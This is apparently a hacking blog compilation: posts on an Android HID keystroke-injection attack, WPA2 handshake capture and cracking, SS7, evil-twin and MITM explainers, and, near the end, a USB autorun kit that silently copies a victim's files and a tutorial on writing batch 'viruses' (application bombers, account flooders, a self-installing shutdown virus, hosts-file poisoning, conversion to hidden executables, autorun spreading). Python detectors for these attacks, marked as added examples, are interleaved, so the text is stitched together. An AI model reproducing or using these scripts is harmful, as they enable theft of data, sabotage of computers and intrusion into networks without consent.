Tuesday, May 11, 2021

Use phone As Rubber Ducky Against Another phone

 

Posted by VIVEK SHUKLA

Use Android as Rubber Ducky against another Android device

HID attack using Android
Using Android as a Rubber Ducky against Android. This is not a new technique, just a demo of how to perform a HID attack using Android instead of a Rubber Ducky. The targeted Android device does not need to be rooted, have ADB/USB debugging enabled, or be authorized, since the attacker’s smartphone behaves as a connected keyboard.

How to prevent this from happening

  1. charge your smartphone using your own adapter
  2. use a non-trivial PIN or password for lockscreen protection
  3. use mobile security software that will detect and prevent launching of payloads
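As an added example (not part of the original post), the following Python script shows what item 3 looks like from the defending side: it parses kernel log lines of the kind a rooted Android or Linux host prints when a USB device enumerates, and flags any keyboard-class HID device whose vendor/product id is not in an owner-maintained allowlist. The log lines and the allowlist are constructed for this example; the device names and ids in them are invented.

```python
import re

# Constructed sample of Linux kernel log lines (as seen via dmesg or adb logcat
# on a rooted device); not taken from the original post.
SAMPLE_LOG = """\
Apr 28 10:01:02 phone kernel: usb 1-1: New USB device found, idVendor=046d, idProduct=c31c
Apr 28 10:01:02 phone kernel: input: Logitech USB Keyboard as /devices/platform/xhci-hcd/usb1/1-1/1-1:1.0/0003:046D:C31C.0001/input/input5
Apr 28 10:07:45 phone kernel: usb 1-2: New USB device found, idVendor=18d1, idProduct=4ee7
Apr 28 10:07:45 phone kernel: input: Android Keyboard Gadget as /devices/platform/xhci-hcd/usb1/1-2/1-2:1.0/0003:18D1:4EE7.0002/input/input6
Apr 28 10:07:45 phone kernel: input: Android Mouse Gadget as /devices/platform/xhci-hcd/usb1/1-2/1-2:1.0/0003:18D1:4EE7.0002/input/input7
"""

# Assumed allowlist of (vendor id, product id) pairs for keyboards the owner
# actually uses; maintained by the device owner, constructed here.
KNOWN_KEYBOARDS = {("046d", "c31c")}

INPUT_RE = re.compile(r"input: (?P<name>.+?) as (?P<path>/devices/\S+)")
# HID devices show up in sysfs as BBBB:VVVV:PPPP.NNNN where bus type 0003 is USB.
HID_ID_RE = re.compile(r"/0003:(?P<vid>[0-9A-Fa-f]{4}):(?P<pid>[0-9A-Fa-f]{4})\.\d+/")


def parse_input_devices(log_text):
    """Return one record per 'input: ... as /devices/...' line that carries a USB HID id."""
    devices = []
    for line in log_text.splitlines():
        match = INPUT_RE.search(line)
        if not match:
            continue
        ids = HID_ID_RE.search(match.group("path"))
        if not ids:
            continue  # not a USB HID device (e.g. built-in touchscreen)
        devices.append({
            "name": match.group("name"),
            "vid": ids.group("vid").lower(),
            "pid": ids.group("pid").lower(),
        })
    return devices


def find_unexpected_keyboards(log_text, allowlist):
    """Keyboards whose vendor/product id is not on the allowlist: a cable that was
    plugged in 'to charge' but enumerated as a keyboard is exactly this case."""
    return [
        dev for dev in parse_input_devices(log_text)
        if "keyboard" in dev["name"].lower() and (dev["vid"], dev["pid"]) not in allowlist
    ]


if __name__ == "__main__":
    for dev in find_unexpected_keyboards(SAMPLE_LOG, KNOWN_KEYBOARDS):
        print(f"ALERT: unexpected keyboard '{dev['name']}' (id {dev['vid']}:{dev['pid']})")
```

On a rooted device the same check can be run against live `dmesg` output; on a Linux host the equivalent allowlisting is what tools such as USBGuard enforce before the kernel binds the device.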



Prerequisites

  • rooted Android with HID kernel support (e.g. NetHunter ROM)
  • OTG cable

Script info
This is a custom script, which might not work in your testing scenario. Because of that, you must experiment with the key presses that are sent to the targeted device. The website with my testing payload is not active anymore. A list of all possible keys can be found at the link below.

Execute command
bash hid_attack

How to flash custom ROM with HID support
https://github.com/pelya/android-keyboard-gadget

Brute-force pin using Android as HID
https://github.com/urbanadventurer/Android-PIN-Bruteforce

List of all keys
https://github.com/anbud/DroidDucky/blob/master/droidducky.sh

Feel free to leave a comment below or reach me on Instagram @i_amsilentknight__.


Thursday, May 6, 2021

How to Hack WPA/WPA2 WiFi Using Kali Linux?

“Hacking WiFi” sounds really cool and interesting. In practice, hacking WiFi is much easier with a good wordlist. But the wordlist is of no use until we know how to actually use it to crack a hash, and before cracking the hash we first need to obtain it. So, below are those steps along with some good wordlists to crack a WPA/WPA2 WiFi.

Note: Use the below methods only for educational/testing purposes on your own wifi or with the permission of the owner. Don’t use this for malicious purposes.

So, boot up Kali Linux. Open the terminal window. And perform the following steps.

Step 1: ifconfig (interface configuration): view or change the configuration of the network interfaces on your system.

ifconfig

[Image: ifconfig output showing the interface configuration]



Here,

  • eth0 : First Ethernet interface
  • lo : Loopback interface
  • wlan0 : First wireless network interface on the system. (This is what we need.)

Step 2: Stop the current processes which are using the WiFi interface.

airmon-ng check kill

[Image: airmon-ng check kill output]

Step 3: Start wlan0 in monitor mode.

airmon-ng start wlan0

[Image: airmon-ng start wlan0 output]

Step 4: View all the WiFi networks around you.

airodump-ng wlan0mon

[Image: airodump-ng listing of nearby networks]

Here,



  • airodump-ng : For packet capturing
  • wlan0mon : Name of the interface (this name can be different on different devices)

Press Ctrl+C to stop the process when you have found the target network.

Step 5: To view the clients connected to the target network.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

[Image: clients connected to the target network]

Here,

  • airodump-ng : For packet capturing
  • -c : Channel
  • --bssid : MAC address of the wireless access point (WAP)
  • -w : The directory (file prefix) where you want to save the capture file
  • wlan0mon : Name of the interface.

Step 6: Open a new terminal window to disconnect the clients connected to the target network.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

[Image: aireplay-ng deauthentication output]

  • aireplay-ng : To inject frames
  • -0 : For deauthentication
  • 10 : Number of deauthentication packets to send
  • -a : For the bssid of the target network
  • wlan0mon : Name of the interface.

When the client is disconnected from the target network, it tries to reconnect, and when it does you will see something called a WPA handshake in the previous terminal window.

[Image: WPA handshake captured]

Now, we are done with capturing the packets. So, now you can close the terminal window.
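The deauthentication burst in Step 6 is also the signal a defender looks for on the air. As an added example that is not from the original post, here is a small Python detector that counts deauthentication frames per BSSID in a sliding time window and raises an alert when the count reaches a threshold. The frame records are constructed; in practice they would be exported from a monitor-mode capture, where a deauthentication frame is management type/subtype 0x0c.

```python
from collections import defaultdict, deque

# Constructed 802.11 frame summaries: capture timestamp in seconds, frame
# subtype, and the BSSID the frame claims to come from. Invented for this
# example; a real feed would be exported from a monitor-mode capture.
SAMPLE_FRAMES = (
    [{"ts": 50.0, "subtype": "deauth", "bssid": "aa:bb:cc:dd:ee:02"}]     # lone deauth: normal roaming
    + [{"ts": 99.5, "subtype": "beacon", "bssid": "aa:bb:cc:dd:ee:01"}]
    + [{"ts": 100.0 + i * 0.1, "subtype": "deauth", "bssid": "aa:bb:cc:dd:ee:01"}
       for i in range(10)]                                                  # ten deauths in one second
    + [{"ts": 300.0, "subtype": "deauth", "bssid": "aa:bb:cc:dd:ee:02"}]
)


def detect_deauth_floods(frames, window_s=2.0, threshold=5):
    """Sliding-window counter of deauthentication frames per BSSID.

    Returns one alert per BSSID the first time `threshold` or more deauths are
    seen within any `window_s` seconds. Legitimate deauths are sparse; a burst
    is what a forced-reconnect attack looks like on the air.
    """
    recent = defaultdict(deque)   # bssid -> timestamps of deauths still inside the window
    alerted = set()
    alerts = []
    for frame in sorted(frames, key=lambda f: f["ts"]):
        if frame["subtype"] != "deauth":
            continue
        bssid = frame["bssid"].lower()
        window = recent[bssid]
        window.append(frame["ts"])
        while window and frame["ts"] - window[0] > window_s:
            window.popleft()  # drop timestamps that fell out of the window
        if len(window) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(window),
                           "first_ts": window[0], "last_ts": frame["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood from {alert['bssid']}: {alert['count']} frames "
              f"between t={alert['first_ts']:.1f}s and t={alert['last_ts']:.1f}s")
```

The threshold and window are tuning knobs: a busy enterprise AP legitimately sends a handful of deauths per minute, so the rates seen on your own network over a quiet day are the baseline to set them against. Enabling 802.11w (Protected Management Frames) on the AP is the control that makes forged deauths ineffective in the first place.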

Step 7: To decrypt the password, open the Files application.

[Image: the capture file in the Files application]

Here, hacking-01.cap is the file you need. Run:

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

  • aircrack-ng : 802.11 WEP and WPA-PSK key cracking program
  • -a : -a2 for WPA2 & -a for WPA network
  • -b : The BSSID of the target network
  • -w : Location of the wordlist file
  • /root/hacking-01.cap : Location of the cap file

You can download a file of common passwords from the internet, and if you want to create your own file you can use the crunch tool.

[Image: aircrack-ng reporting the key found]

What is SS7?

Introduced and adopted in the mid 70s, SS7 (Common Channel Signaling System No. 7 or C7) has been the industry standard since and hasn’t advanced much in decades. Its outdated security concepts make it especially vulnerable to hackers.

SS7’s success has also, in a way, been its curse, at least when it comes to cyber security. The SS7 protocol is used everywhere and is the leading protocol for connecting network communication worldwide. Because it is so prevalent, it is used by both intelligence agencies and mobile operators, and from a surveillance perspective it is considerably effective. As such, SS7 is an attacker’s best friend, giving them access to the same surveillance capabilities held by law enforcement and intelligence agencies.

How does SS7 work?

The set of SS7 telephony signaling protocols is responsible for setting up and terminating telephone calls over a digital signaling network to enable wireless cellular and wired connectivity. It is used to initiate most of the world’s public telephone calls over PSTN (Public Switched Telephone Network).

[Image: call setup example]

Over time other applications were integrated into SS7. This allowed for the introduction of new services like SMS, number translation, prepaid billing, call waiting/forwarding, conference calling, local number portability, and other mass-market services.

Components and elements that make up the SS7 protocol stack:

[Image: SS7 protocol stack]

What are SS7 attacks?

SS7 attacks are mobile cyber attacks that exploit security vulnerabilities in the SS7 protocol to compromise and intercept voice and SMS communications on a cellular network. Similar to a Man In the Middle attack, SS7 attacks target mobile phone communications rather than wifi transmissions.

How do SS7 attacks work?

SS7 attacks exploit the authentication capability of communication protocols running atop the SS7 protocol to eavesdrop on voice and text communications. According to telecommunications experts, all a cyber criminal would need to successfully launch an SS7 attack is a computer running Linux and the SS7 SDK, both free to download from the Internet.

Once connected to an SS7 network, the hacker can target subscribers on the network while fooling the network into thinking the hacker device is actually an MSC/VLR node.

[Image: SMS interception, stage 1]

[Image: SMS interception, stage 2]

What’s in it for the Hackers?

When a hacker successfully performs a MitM phishing attack, they gain access to the same amounts and types of information that are usually reserved for the use of security services. Having the ability to eavesdrop on calls and text messages, as well as device locations empowers hackers to gain valuable information.

A common security precaution used by many is one of the targets of SS7 attacks. Two-factor authentication (also known as 2FA) via SMS using SS7 is inherently flawed as these SMS messages are unencrypted and hackers know how to intercept them. With the code from the SMS in their hand, a cyber-criminal can potentially reset your password to Google, Facebook, WhatsApp account, or even your bank account.

The Risks to Digital Businesses

It doesn’t take an expert to see that it takes little skill and equipment for a hacker to successfully mount a man-in-the-middle (MitM) phishing attack. With most businesses managing their communications over cellular connections, it’s clear that SS7 attacks pose a significant risk. It’s important to remember that it isn’t only proprietary or confidential information hackers are interested in. The growing prevalence of IoT devices reliant on mobile networks to transmit data is expanding the risk playing field.

An enterprise’s IoT infrastructure and critical services can be prime targets. Such attacks can lead to potentially damaging breaches of confidential information as well as hijacking or disabling of mission-critical devices and services.

Considering how high the risks are, manufacturers are doing too little to warn businesses using IoT devices about potential security vulnerabilities in their products. This exposes network operators to attacks through compromised customer IoT devices on their network.

What can mobile operators do to prevent SS7 attacks?

The flaws and vulnerabilities inherent in the SS7 protocol are outside the jurisdiction of enterprises, small businesses and consumers. Because of that, SS7 vulnerabilities cannot simply be removed or fixed.

The GSMA recommends that mobile network operators focus on consumer education. With consumers paying more attention to the security of their smartphones and IoT devices, they are more likely to take action to secure their devices, especially when it comes to critical applications and services like smart homes and offices.

1. User Password Security

Two-factor SMS authentication, flawed as it is, is still widely used. Security-conscious businesses and services are gradually moving away from SMS and offer other methods of authenticating users which do not rely on antiquated telephone protocols like SS7.

2. Monitoring & Event Analysis

If an SS7 network is successfully compromised, companies need to have the ability to monitor the activity during the attack. They need to be informed on security events in the context of what is happening on corporate servers as well as devices. This needs to be part of any enterprise mobile security strategy. Ultimately, businesses need to implement a defense that identifies threats and takes action before any damage occurs.

3. Regular Updates

Cyber security is not a set-it-and-forget-it deal, even if you employ automation. Cybercriminals are always coming up with new exploits and approaches to compromise systems to get their hands on confidential data or hijack devices for ransom. Effective patch management is critical and complements adaptive defense. By employing real-time analysis of endpoint security, businesses can ensure known vulnerabilities are sealed as soon as possible through software and firmware updates.

What can YOU do? 

The only way to be fully safe from SS7 attacks is to simply shut your smartphone off. You and I both know that’s not an option. So what you can do is “know the enemy”. Being aware that malicious activities like SS7 attacks are prevalent and common is simply a necessity in 2020.

That said, with the billions of mobile phone users worldwide, the risk of you being targeted for surveillance by cyber-criminals is probably small. But if you happen to be a president, queen or even doctor holding sensitive patient information on their mobile, your chances are much higher than those of an average Joe. If you’re still using 2FA for banking services, you might very well be in danger of having your account compromised.

Considering just how easy it is to execute an SS7 attack and how much damage a successful one can do to both the victim and their service provider, one can only hope that innovation in telecom will protect us, the end users. For enterprises, government agencies and MSPs today there are numerous solutions, ranging from complex customized mobile VPN systems to innovative plug-and-play solutions like FirstPoint SIM-based user-level protection.

Man-in-the-Middle Attack

A Man-in-the-Middle Attack (MITM) is a form of cyber eavesdropping in which malicious actors insert themselves into a conversation between two parties and intercept data through a compromised but trusted system. The targets are often intellectual property or fiduciary information. MITM aggressors will also use malware to open the communications channel with the hope of creating zombie machines or building vast networks of compromised systems. Man-in-the-Middle Attacks can be used as a way into systems in order to execute an advanced persistent threat (APT).

In many cases organizations are unaware their session and/or data has been tampered with until it is much too late. If a MITM attack is successful, organizations experience negative brand perception, reduced customers’ confidence and ultimately a damaged bottom line. 

Understanding Evil Twin AP Attacks and How to Prevent Them

The attack surface remains largely unprotected from Wi-Fi threats that can result in stolen credentials and sensitive information as well as backdoor/malware payload drops.

It's been nearly 20 years since IEEE 802.11b was released and the world got the first Wi-Fi-branded products. And yet the Layer 2 attack surface remains largely unprotected from dangerous Wi-Fi threats that can result in stolen credentials and sensitive information as well as backdoor/malware payload drops. Attackers have been exploiting a fundamental issue with Wi-Fi: Laptops, smartphones, and connected devices aren't equipped to distinguish between two radios broadcasting the same SSID name. This allows hackers to use malicious access points (APs) that eavesdrop on traffic, establish "man-in-the-middle" (MitM) positions, and extract sensitive information, often without leaving any traces behind.  

One of the most dangerous Wi-Fi threat categories is undoubtedly "evil twin" APs, an attack technique nearly two decades old. In fact, the US Department of Justice recently charged hackers within the Russian military agency GRU with implementing evil twin AP attacks to steal credentials and "plant espionage-oriented malware" targeting organizations such as anti-doping agencies, nuclear power operations, and chemical testing laboratories.

How did these GRU attacks work? The threat actor used 802.11 radios to broadcast the same SSIDs as offices and hotels in order to trick victims' devices into associating, thereby establishing their MitM position and supplying Internet service through 4G LTE connections to evade network security. Let's take a closer look at evil twin attacks to better understand defense best practices and techniques.

Analyzing Evil Twin AP Attacks
In a normal Wi-Fi connection, a person's client device (image below) associates with a legitimate AP. 

Source: Ryan Orsi, WatchGuard
When an evil twin AP is present, a threat actor broadcasts the same SSID as the legitimate AP (and often the same BSSID or MAC address of the SSID) to fool the device into connecting (image below).

Source: Ryan Orsi, WatchGuard

In the case of the GRU evil twin attacks, hackers reportedly used a popular pen-testing tool — the Wi-Fi Pineapple from Hak5 — connected to high-gain antennas, battery packs, and a mobile 4G LTE WAN backhaul connection located in the trunks of their cars or carried within backpacks into buildings. The Wi-Fi Pineapple automates much of the labor required to set up an evil twin attack.

While within range of the target SSID, attackers begin by broadcasting the same SSID. This is straightforward and can even be done on smartphones with data plans that allow mobile Wi-Fi hotspot tethering. Attackers looking to avoid drawing suspicion toward antennas and battery packs typically opt for a popular tool called bettercap, which can run natively on Linux, Mac, Windows, and Android systems.

The bettercap command used to configure a fake SSID to be broadcasted natively from a laptop or other client is "wifi.ap.ssid."
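The detection side of the two diagrams above, as an added example that is not from the original article: a wireless IDS sensor or a periodic site survey produces a list of (SSID, BSSID, channel, signal) observations, and the script below compares them against an inventory of the access points the organisation actually owns. It flags an owned SSID advertised from a BSSID that is not in the inventory (the evil twin with its own radio) and an owned BSSID seen on a channel other than the one it is configured for (the cloned-BSSID variant). The inventory and the scan results are constructed for this example.

```python
# Assumed inventory of the organisation's own access points (constructed for
# this example): SSID -> {BSSID: channel it is configured on}.
AUTHORIZED_APS = {
    "CorpWiFi": {"aa:bb:cc:00:00:01": 6, "aa:bb:cc:00:00:02": 11},
}

# Constructed scan results of the kind a wireless IDS sensor or a site-survey
# tool reports, one entry per beacon source seen. All values are invented.
SAMPLE_SCAN = [
    {"ssid": "CorpWiFi",  "bssid": "AA:BB:CC:00:00:01", "channel": 6,  "rssi": -48},
    {"ssid": "CorpWiFi",  "bssid": "AA:BB:CC:00:00:02", "channel": 11, "rssi": -61},
    {"ssid": "CorpWiFi",  "bssid": "DE:AD:BE:EF:00:99", "channel": 1,  "rssi": -35},  # our SSID, not our radio
    {"ssid": "CorpWiFi",  "bssid": "AA:BB:CC:00:00:01", "channel": 11, "rssi": -30},  # our BSSID, wrong channel
    {"ssid": "GuestCafe", "bssid": "12:34:56:78:9A:BC", "channel": 3,  "rssi": -70},  # not ours, ignored
]


def audit_beacons(scan, authorized):
    """Return alerts for owned SSIDs advertised from unknown BSSIDs, and for
    owned BSSIDs heard on a channel other than the configured one.

    Alerts are ordered strongest signal first: an evil twin has to out-shout
    the real AP to win the client's association, so the loudest anomaly is
    usually the one to walk towards.
    """
    alerts = []
    for obs in scan:
        ssid = obs["ssid"]
        if ssid not in authorized:
            continue  # someone else's network; not our problem to police
        bssid = obs["bssid"].lower()
        expected = authorized[ssid]
        if bssid not in expected:
            kind = "unknown_bssid"
        elif expected[bssid] != obs["channel"]:
            kind = "channel_mismatch"
        else:
            continue  # matches inventory
        alerts.append({"kind": kind, "ssid": ssid, "bssid": bssid,
                       "channel": obs["channel"], "rssi": obs["rssi"]})
    alerts.sort(key=lambda a: a["rssi"], reverse=True)
    return alerts


if __name__ == "__main__":
    for alert in audit_beacons(SAMPLE_SCAN, AUTHORIZED_APS):
        print(f"{alert['kind']}: {alert['ssid']} from {alert['bssid']} "
              f"on ch {alert['channel']} at {alert['rssi']} dBm")
```

A BSSID clone parked on the same channel as the real AP will not trip the channel check; catching that needs per-BSSID fingerprinting (beacon interval, supported rates, vendor IEs), which is what commercial WIPS sensors add on top of this inventory comparison.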

Thursday, September 10, 2020

Steal someone's secret file through a USB flash drive

Steal Someone's Secret Files Using a USB Flash Drive.


Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.

STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
Code:
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf

The icon line is optional. You can change the icon to your taste or leave it as the default icon. It’s useful for social engineering purposes, like enticing the user to click a file on the drive by making it look like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell\open\command” line also acts as a backup in case the user clicks Cancel instead of Open when prompted. This code will execute when the drive letter is clicked on.

STEP 2

Open Notepad again and copy-paste the following lines
Code:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls

Save this as file.bat

This file is configured to copy the contents of the current user’s Pictures, Favorites, and Videos folders to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.

STEP 3

Open Notepad once again and copy-paste the following line.
Code:
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

Save this as invisible.vbs

This code runs file.bat as a hidden process, so the CMD prompt and everything the batch file is processing are not shown.
STEP 4

Open Notepad one last time and copy-paste the following line.
Code:
wscript.exe \invisible.vbs file.bat

Save this as launch.bat

This batch file does two things: it looks for the invisible.vbs file in the root of the Flash drive, then loads it with file.bat, so file.bat is run by the VBS file.
STEP 5

Copy all 4 files created in the above steps and put them on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can give this folder any name, but then you need to reflect the change in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly

Wednesday, September 9, 2020

Batch files

Batch Files – the art of creating viruses

I could just give you the codes to paste in notepad and ask you to save files with extension .bat, and your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files ?

Let’s begin with a simple example. Open your command prompt and change your current directory to ‘desktop’ by typing ‘cd desktop’ without quotes.
Now type these commands one by one

1. md x //makes directory ‘x’ on desktop
2. cd x // changes current directory to ‘x’
3. md y // makes a directory ‘y’ in directory ‘x’

We first make a folder/directory ‘x’, then enter folder ‘x’, then make a folder ‘y’ in folder ‘x’.
Now delete the folder ‘x’.
Let’s do the same thing another way. Copy these three commands into notepad and save the file as anything.bat

Now just double click on this batch file and the same work would be done , You will get a folder ‘x’ on your desktop and folder ‘y’ in it. This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text file containing a series of commands which are executed automatically, line by line, when the batch file is run.

What can batch viruses do ?

They can be used to delete Windows files, format data, steal information, irritate the victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy the registry, and for many more purposes.

Now let’s start with simple codes. Just copy the code to notepad and save it as anything.bat (name it anything you wish, but the extension must be .bat, and save it as ‘All files’ instead of text files).

Note: Type ‘help’ in command prompt to know about some basic commands and to know about using a particular command , type ‘command_name /?’ without quotes.

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code, when executed, will keep opening different applications like Paint, Notepad and the command prompt repeatedly, irritating the victim and of course affecting performance.

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that generates a random positive number. So this code would keep creating folders whose names are random numbers.

3.User account flooder

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

4.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note: Files in the Startup folder get started automatically when Windows starts. You should put the first two lines of code in every virus code so that it copies itself to the Startup folder. The Startup folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

5. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place an IP address in it with a website name after it. By doing this, we make the web browser take us to the host at that IP when that website name is entered. That is, the request to resolve the IP of the website is not sent to the Domain Name Server (DNS) if the name of the website is in the hosts file.

@echo off
echo xxx.xxx.xxx.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxxhttp://www.anything.com in hosts file.

Replace xxx.xxx.xxx.xxx and http://www.anything.com with the IP address and website of your choice. You can take/redirect the victim to any host located at a specific IP when he tries to log on to a specific website, or you can simply block any website by entering its name and any invalid IP address.
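The hosts file is also one of the easiest places to look for this kind of tampering. As an added example that is not from the original post, the Python below parses hosts-file content and reports two things: an entry that maps a domain you care about (a bank, a login portal) to an address that is neither loopback nor the 0.0.0.0 sinkhole, and a malformed name such as a full URL, which is what the `echo` line above actually writes (a hosts entry takes a bare hostname, not an `http://` URL). The file content, the watched domains and the addresses (RFC 5737 documentation ranges) are constructed for this example.

```python
import ipaddress

# Constructed hosts-file content; the addresses are RFC 5737 documentation ranges.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net          # sinkhole entry, harmless
203.0.113.5     www.example-bank.com     # silently redirects a watched domain
192.0.2.1       http://www.anything.com  # malformed: a URL is not a hostname
"""

# Assumed list of domains whose resolution must never be overridden locally.
WATCHED_DOMAINS = {"example-bank.com", "login.example.org"}


def parse_hosts(text):
    """Return (line_number, address, [hostnames]) for each non-comment entry."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # strip trailing comments
        if not line:
            continue
        parts = line.split()
        entries.append((lineno, parts[0], parts[1:]))
    return entries


def audit_hosts(text, watched):
    """Flag malformed entries and any watched domain pointed at a real address."""
    findings = []
    for lineno, ip, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append({"line": lineno, "issue": "malformed_ip", "entry": ip})
            continue
        for name in names:
            host = name.lower()
            if "://" in host or "/" in host:
                findings.append({"line": lineno, "issue": "malformed_hostname", "entry": name})
                continue
            is_watched = any(host == d or host.endswith("." + d) for d in watched)
            # loopback and 0.0.0.0 are the normal blocking idioms; anything else is a redirect
            if is_watched and not addr.is_loopback and not addr.is_unspecified:
                findings.append({"line": lineno, "issue": "redirect", "entry": f"{host} -> {ip}"})
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS, WATCHED_DOMAINS):
        print(f"line {f['line']}: {f['issue']}: {f['entry']}")
```

Run against the real file (C:\Windows\System32\drivers\etc\hosts on Windows, /etc/hosts elsewhere) this is a cheap scheduled integrity check; pairing it with a stored hash of the last known-good file catches rewrites even of domains not on the watched list.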

Viruses we just coded

Note : Most batch viruses are simply undetectable by any antiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations, we need to convert these batch files into executable files, that is, .exe files.
Download this Batch To Exe converter from here.

After running the converter, open the batch file virus, save it as an exe file, set the visibility mode to ‘Invisible application’, then just click on the compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico

Save the file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

have FunNN
